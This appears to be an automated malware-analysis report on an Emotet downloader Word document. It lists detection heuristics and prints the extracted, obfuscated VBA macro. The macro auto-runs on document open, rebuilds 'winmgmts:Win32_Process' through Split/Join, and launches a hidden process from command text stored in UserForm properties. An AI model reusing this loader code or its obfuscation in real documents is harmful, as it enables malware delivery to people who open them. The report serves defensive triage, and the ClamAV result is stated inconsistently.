Verdict: MALICIOUS
Risk Score: 232

Heuristics (8)
- ClamAV: Doc.Downloader.Emotet-7464930-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Downloader.Emotet-7464930-0
- VBA macros detected (medium, OLE_VBA_MACROS; 4 related findings): Document contains VBA macro code
- VBA UserForm hidden-property command stager (critical, OLE_VBA_USERFORM_HIDDEN_COMMAND_STAGER): VBA auto-exec macro creates a COM object from a decoded variable and reconstructs command text through Split/Join and hidden UserForm properties such as ControlTipText, Tag, Pages, or HelpContextId. This is a high-confidence macro downloader/loader shape seen in the reviewed OLE set, but it is not an Office CVE exploit primitive.
  Matched line in script:
  Scryvwusn = Join(Split("23nNNgi3_7&&jjNN#" + "win23nNNgi3_7&&jjNN#mg23nNNgi3_7&&jjNN#mt23nNNgi3_7&&" + "jjNN#s:23nNNgi3_7&&jjNN#Wi23nNNgi3_7&&jjNN#n323" + "nNNgi3_7&&jjNN#2_23nNNgi3_7&&jjNN#", hb32bmmejdn), "") + Rnuekdgnz.Aklhsdytvadu + "rocess"
- CreateObject call (high, OLE_VBA_CREATEOBJ): CreateObject call
  Matched line in script:
  Set Klymuqeo = VBA.CreateObject(JJKBSKJ + Scryvwusn)
- VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC): Triggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it; it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
- Document_Open macro (low, OLE_VBA_DOCOPEN): Document_Open macro
  Matched line in script:
  Private Sub Document_open()
- Suspicious extracted artifact (info, EXTRACTED_FILE_STATIC_TRIAGE): One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body; this is the standard OOXML DrawingML schema namespace, not a download location)
Extracted artifacts (1)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 11000 bytes |

SHA-256: 85646354822f474207c7388c28da3b9b8065405706f8cea7b437443a622dca8a

Detection
ClamAV: No threats found
Obfuscation or payload: likely. 294 of 513 identifiers look randomly generated (e.g. 'Sctlzdxzxdrqf'), consistent with name-mangling obfuscation.

Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "Rnuekdgnz"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Control = "Aklhsdytvadu, 0, 0, MSForms, TextBox"
Private Sub Document_open()
Fnwyraaizzj = Ogjykxkgdc
Yirgutaiekt = 820
Ileuznrbp = ("Laurie")
Lhnryicl = (672)
Dim Trjbegijg As Integer
Dim Rpcmgmeotoi As Integer
Dim Vmfjkwiigzo As Integer
Dim Suhisjqqtsle As String
Dim Xwsuldvgrazyk As Double
Dim Kqntktkhk As Boolean
Dim Xxbutesaklofd As Integer
Mchjtyul = (575)
Dim Ylhcnphx As Double
Xexgugjlt = ("Eos voluptate eos ab.")
Jekgizbcad = (603)
Dim Tvtkxxvghrjc As Double
Aompjrmro = Wepgulckmdkbv
Xpcsuhydzmq = Ufbhmobsganf
Vbqnrdvuxovm = "Enim commodi sit eveniet."
Bqtebhqgcdphk = 509
Kqlqkuic = Aarzkjfwlsrg
Yzpnguntveyx = 568
Sctlzdxzxdrqf = ("Magni facere officia.")
Ukehuslfuvtig = (229)
Dim Bmhheiyfgf As Integer
Dim Blwqpswbutqie As Integer
Dim Yqgvqukcejyqo As Double
Dim Ybatjtxfe As Integer
Dim Dshvycxlap As Boolean
Dim Ddqjsgrbif As Integer
Dim Pikxdakcegrsu As Integer
Vtcupyqwqs = (457)
Dim Znpaxdlgp As Double
Izexfxmypjuvh = ("Josefina")
Zxymueuulo = (463)
Dim Tpjbvdutv As Boolean
Lzeuuwer = Ndnidxvoesjq
Jfhzrnnpoxnm = Zyhxhlglvt
Yfqrruill = "Nostrum maxime."
Fzuhxoqvrgk = 328
Ftuoycmovq = Xnyirdfi
Kxjxzxkg = 755
Wqumxsmxeav = ("Omnis quos voluptas.")
Bhyicmebwdf = (701)
Dim Eacpepjcdgsll As Boolean
Dim Hdifajiqboh As Double
Dim Nanpdanl As Integer
Dim Vgamxagwqnn As String
Dim Uzinwkbawuhp As String
Dim Dikkfmomzzwk As Boolean
Dim Sqhothspunrb As Integer
Ylswthcngch = (144)
Dim Iajqmugi As String
Swwanoxtesa = ("Magnam est.")
Gaqisekegld = (107)
Dim Lxfgngsyaax As Double
Zijdodumcpv = Dvilksqyczn
Uvpgzsbde = Dxapcjhjuycxq
Eqqwjvgjizx = "Animi saepe."
Cjlytmimsav = 254
Odmoouhgcoht
End Sub
Attribute VB_Name = "Afvutucle"
Attribute VB_Base = "0{6D21C294-5A0A-46C4-9146-94AE55B0D5C4}{ECBC2FEA-BBAE-4612-B6FE-B738BF045118}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "Ixcmyxdxrtr"
Function Wzwxawzlswk()
Dnasihwb = Fgfpxyxtmweo
Kgqeccvwwx = 687
Rjjjpfjvbvqq = ("Phil")
Oowkxpxphcqs = (890)
Dim Wjjhaghokdhye As String
Dim Opawhohzmz As Double
Dim Cbgswgkzsmip As Integer
Dim Zdtczkcftnq As String
Dim Kojxiblfmek As Integer
Dim Tvschkvupdfk As Integer
Dim Rwitcbpakio As String
Pimzjrhrgmq = (400)
Dim Awukdnimu As Integer
Lhjbskjng = ("Aliquam cumque modi.")
Mcdwssxkj = (948)
Dim Wasfzebrcv As Double
Obhfywdcz = Kshhuqojymyl
Mlfmptkmup = Myogpnmgin
Gbombvqqywmlx = "Debitis quod ut magnam."
Rjxxsmjdpu = 92
Xbvbgxrxhz = Rnuekdgnz.Aklhsdytvadu
Bjvaaazo = Ebrbgfeiy
Fvdfpizttorkx = 780
Kgczsxalu = ("Vero ipsa atque id.")
Nadhssfd = (18)
Dim Sukszuwtmqt As Boolean
Dim Uxfyjzfk As String
Dim Nvzpmvyftkrsl As Boolean
Dim Scdrhtisz As String
Dim Muvdqeiyxx As Integer
Dim Kxolakicm As String
Dim Qxbsbdedahc As Integer
Jptnjnvks = (403)
Dim Tthihqgxycfg As Boolean
Hvsuzxiojb = ("Sed.")
Uszshxaizhv = (905)
Dim Kaekbejeccrd As Integer
Zkekgyqvnygv = Glzavypxd
Xalsqhpre = Uxoyeomgegwdy
Rhrechbc = "Sapiente quas necessitatibus ullam velit iure dolorem."
Fdxqqedeiqclx = 969
Ipiwqzcqevo = Xbvbgxrxhz + Afvutucle.Gkecxtky + Afvutucle.Tkmteuts + Afvutucle.Uizvcuedhy
Pwbqcbdu = Pkaiykfojxne
Gbreyzwllbfk = 885
Quvnkmzu = ("Voluptas aut sed nesciunt.")
Uowdppoki = (33)
Dim Akzvaxdzyc As Integer
Dim Eyobaubu As Integer
Dim Kjkctwvnv As String
Dim Rpkwrjpwuydgk As Boolean
Dim Bnoqhmxwz As String
Dim Xdhdlhmfni As Integer
Dim Iklysggdz As Boolean
Uiyftmutkgf = (676)
Dim Oqmwtfewxh As Integer
Wofpsmlmo = ("Reprehenderit explicabo.")
Nctttotydyyj = (673)
Dim Kkuhswatzxxp As Double
Utzycuzualkh = Cgxfdvibqf
Vtcvvekbejz = Guqkiwlsr
Zsliksctcmzf = "Perspiciatis."
Qgwdeshxx = 313
Bqwkbpkzip = Ipiwqzcqevo + Afvutucle.Sjrnukxepun + Afvutucle.Rwzjuoionfy.Factoid
Midsxvzperwg = Jqfiynjahuwgy
Kqbfxqpppgz = 953
Gcizenhgztvp = ("Voluptatem voluptates explicabo.")
Aivrxxauau = (262)
Dim Itapczoot As Double
Dim Wbluilxgpo As Integer
Dim Guocaumcnxx As Integer
Dim Fkrwbutvwyq As Integer
Dim Ridomtef As Boolean
Dim Nwnugcyzdhgc As Integer
Dim Jotkskvyr As String
Dyylezim = (155)
Dim Znzntyzm As Double
Ohxeyzumjapfq = ("Amet assumenda corrupti necessitatibus dolores deleniti doloremque magnam tempora.")
Dznzhxqm = (779)
Dim Atwzmvlman As Integer
Tnffwcoo = Hkpymnxzyvuux
Mxedsqegbgzub = Xoqdlmjniyp
Zgzqzijekka = "Terry"
Dnrmsvxk = 745
Wzwxawzlswk = Fmenbjha + Bqwkbpkzip + Fmenbjha
Smdkthrx = Wgxvvyhofof
Xzojgunmfwu = 649
Ecgsrofqyeq = ("Non facilis dicta quisquam.")
Mglsdxmw = (36)
Dim Fxldqcrkcc As Boolean
Dim Einxrazzuxqf As Integer
Dim Bmtwfsyra As Integer
Dim Loohunqus As Integer
Dim Fggmxgqh As String
Dim Vjbfqfwnw As String
Dim Tqfllrajz As Double
Fyhnqtvrbtm = (620)
Dim Fmbdhugwovm As Integer
Amoqxitg = ("Quibusdam laudantium harum.")
Xdpdsemn = (132)
Dim Pgyqwbfetqc As Boolean
Ptidkvehiajda = Orchfzltoyt
Onnadfaj = Brcihfom
Oqboupydzu = "Jordan"
Absumjaurhe = 652
End Function
Function Odmoouhgcoht()
Wgigiqzqxuh = Beloxxtqz
Gnpvdhwvmmp = 125
Spivnsjekyev = ("Qui et qui sunt qui enim.")
Anfzxlraubdnq = (843)
Dim Xtmjsvioxd As Integer
Dim Lvplzqhwhg As Boolean
Dim Ibsuhszcltne As Boolean
Dim Ueryiwqzfe As Double
Dim Exjbeqguarc As Double
Dim Edeasiksn As Double
Dim Ejyqbjvo As Integer
Nbtjpwyxkcb = (622)
Dim Dsmymwuxqbf As Integer
Sptrvoxqrbkr = ("Qui.")
Lvdtbasuyo = (56)
Dim Rvtxanmud As String
Thngamqbh = Ibniewcyqe
Wbwtbxfjicq = Ourihndzin
Siprfsamtq = "Ea ea itaque exercitationem repudiandae quisquam autem quos aut."
Tpdbzafl = 438
hb32bmmejdn = "23nNNgi3_7&&jjNN#"
Scryvwusn = Join(Split("23nNNgi3_7&&jjNN#" + "win23nNNgi3_7&&jjNN#mg23nNNgi3_7&&jjNN#mt23nNNgi3_7&&" + "jjNN#s:23nNNgi3_7&&jjNN#Wi23nNNgi3_7&&jjNN#n323" + "nNNgi3_7&&jjNN#2_23nNNgi3_7&&jjNN#", hb32bmmejdn), "") + Rnuekdgnz.Aklhsdytvadu + "rocess"
Mmbtadhosa = Ujbivtkuivmq
Jkwfonuxulzsv = 121
Ahhjvarmv = ("Quis ratione cum aliquam sit quaerat veniam aliquid.")
Ezbqzlddtxrnm = (23)
Dim Xpqicympiofgt As Integer
Dim Xaooiuvdloor As Double
Dim Ituqydcvm As String
Dim Rkscueji As Integer
Dim Ryyjdble As Double
Dim Hiizulpvsqb As Integer
Dim Mrkdbrje As Double
Grvvhvcq = (625)
Dim Zuibtijpopky As Boolean
Lssyknljxfchy = ("Amet ipsa et nihil ut.")
Zqakvbsii = (354)
Dim Huptsioxjpcd As Integer
Gqwczljt = Zknhwtjjosf
Enttbftxmuho = Gjyionbtivgb
Sonxpwspf = "Ramiro"
Onrnpgsky = 687
Set Klymuqeo = VBA.CreateObject(JJKBSKJ + Scryvwusn)
Zxrjsuuw = Pvngwezxeacp
Grembiahqre = 889
Cqfnaurkgq = ("Consequuntur.")
Pfyxryjyadb = (135)
Dim Vhtiewbmrw As Double
Dim Mcvhgzavylccj As Double
Dim Vmlzppeemxbb As String
Dim Bxiryfwoq As Double
Dim Atkkfryf As Boolean
Dim Zgxrjhxij As Double
Dim Goxntlkuvgvrv As Integer
Uthgdwqabrlao = (353)
Dim Fgqftfmwlfnli As Integer
Obbnmeac = ("Nemo.")
Qovwilvw = (128)
Dim Paqvqhxv As Double
Kiaxcjyblue = Ddqqadurolz
Lfxegfclqhn = Znulcvllmszr
Gxwwbioxsdgn = "Quis inventore sit hic quo."
Dnvdshdh = 152
Sheihghumywl = Scryvwusn + Afvutucle.Phkifueuuw.ControlTipText + Afvutucle.Kwnqamuppcgx.ControlTipText
Utsrjsymed = Iaqmfqkywvm
Ratfxsjlktiev = 848
Fdfidtusqzxgb = ("Sed est.")
Yhjsssfhhly = (114)
Dim Hhhknlttqeffw As Boolean
Dim Gzlhyvva As Integer
Dim Jhavywfp As Boolean
Dim Irnsqtwicd As Integer
Dim Kcbhzqfclgmhd As String
Dim Xrizqawtomsr As Integer
Dim Nyrqnwxurwpjt As Integer
Fgomzzqu = (831)
Dim Vojnvhzbeyiu As Double
Hwcalkhgwri = ("Ut quia.")
Fezwdovs = (418)
Dim Hvpqhpbtlqz As String
Wqjtoorr = Dtwfbfguxzi
Vuzruywoe = Cguuhdqw
Mwkjzofvb = "Facere qui."
Alnyowwthayt = 436
Esydxetckuhsv = Sheihghumywl + Rnuekdgnz.Aklhsdytvadu
Fdzemvjzjsifz = Cswaathrat
Vqtwcrbwnhsy = 809
Wlpvpsfiqmb = ("Omnis enim iste et iste.")
Eylzkkbn = (706)
Dim Wfoyqwvzxbm As Double
Dim Bfdjomzhvknxx As Boolean
Dim Hoxamvtqb As Double
Dim Lumdrrhcjug As Double
Dim Akhbuabsun As Boolean
Dim Dlkaiocoaa As Boolean
Dim Rtwpvsoanlzc As Double
Vbtvrhutnfwc = (409)
Dim Emmafmjbd As String
Czqwrlhlqtbve = ("Accusantium officiis qui possimus.")
Ayfqttqiwazzx = (4)
Dim Uxhypidxw As Integer
Qlldqhqillv = Dlquvslkjhyd
Uoxajwecf = Krjprxykpvds
Diehdmzc = "Est provident aut molestias sint."
Tokmqoaftblbc = 731
Set Odmoouhgcoht = CreateObject(Esydxetckuhsv)
Zuzigbnzsb = Zxtmwbojbmwh
Axiixnqfhp = 763
Wvsykzdw = ("Earnest")
Bdbkbgjnysbu = (557)
Dim Rjepeuqeose As Boolean
Dim Cbwekzjvehm As Boolean
Dim Vurfcbucha As String
Dim Srbxpjgipgl As Integer
Dim Rvrvmcseuyw As String
Dim Qdzouabrr As Double
Dim Xpygduoip As Integer
Fchuydiyte = (380)
Dim Tcjbmkzwz As Boolean
Xxelazjnxq = ("Voluptatem.")
Whacyitodmifd = (803)
Dim Cxqvlssjxtri As String
Rnqoemumib = Zglpziggg
Vtfdydihz = Lysrziyqp
Gsmxiujcr = "Voluptatem aut."
Guuziviz = 797
Odmoouhgcoht.XSize = False
Gqlargef = Jpxqfekyxlfc
Wvpwogxua = 281
Zxagnpirmhzq = ("Velit sapiente exercitationem.")
Ptbefyez = (788)
Dim Vqhqjtpom As Double
Dim Gjrjvwleb As String
Dim Xuynwqvmp As Integer
Dim Wkxirhsrkeuw As String
Dim Jukbsvchqs As Double
Dim Wxytzihlmgmm As String
Dim Ljladyoc As Boolean
Lkwdsoueuzkv = (671)
Dim Empxydixxpks As String
Podukdhpldt = ("Leland")
Hrfspqtvrj = (35)
Dim Jnongszs As Integer
Gvqlpkoalea = Frwvccux
Qaqtcekufj = Kcdbjgqxmd
Ivkxxpirai = "In fuga."
Yqmvbjuhit = 723
Odmoouhgcoht.YSize = False
Thpffxgixhx = Ygkkkvjo
Mkarpmclq = 561
Sdhwpcojh = ("Amet necessitatibus voluptatibus assumenda eius eum est nesciunt totam.")
Wfrmjedm = (964)
Dim Wzdvefrwvvhlu As Double
Dim Cnutuepj As Integer
Dim Vacdxiehgwe As Integer
Dim Kwwmldvk As Integer
Dim Jgritjuhqu As Boolean
Dim Fptxmdeojy As Boolean
Dim Kwxsdfndko As Boolean
Gzkxlonjuarhs = (950)
Dim Sfwblifywlc As Integer
Gdzqxwqmsg = ("Ex et est labore quia quasi repellendus et.")
Korjfqzoovyn = (442)
Dim Obbnmjkcc As Integer
Akvydzzu = Tnorucpw
Mdqiolfut = Laiegdqkw
Gguonvrgvgrm = "Ducimus totam omnis."
Unjsueawthngn = 580
Do While Klymuqeo.Create(UJNDB & Wzwxawzlswk, Watbnmftlfyf, Odmoouhgcoht, Ednkgktl)
Loop
Gbpywqsedvzbt = Yfbpvtnn
Dkchnmvtpz = 440
Swwswjbayyyy = ("Jackie")
Ecketnpptgp = (313)
Dim Idhddzfmetc As Double
Dim Mzkfmdaa As Boolean
Dim Ilfmdcdpdaus As Double
Dim Vvzcbzjhhqb As Double
Dim Oulwpajyr As Integer
Dim Ckbdzwitct As String
Dim Exzikbeolmw As String
Sdfrnsdxmaqyf = (431)
Dim Hhomecgyqs As String
Njbpnlhhtdcoa = ("Omnis et saepe.")
Sxikesugdykl = (298)
Dim Eoznuqokkd As Integer
Bqefzlxjnbhiu = Cyrdaovoocag
Imfxfrdcx = Njxdgrtpxmmtz
Gbpcyfhdfo = "Quo dolores."
Pnpzatemex = 632
End Function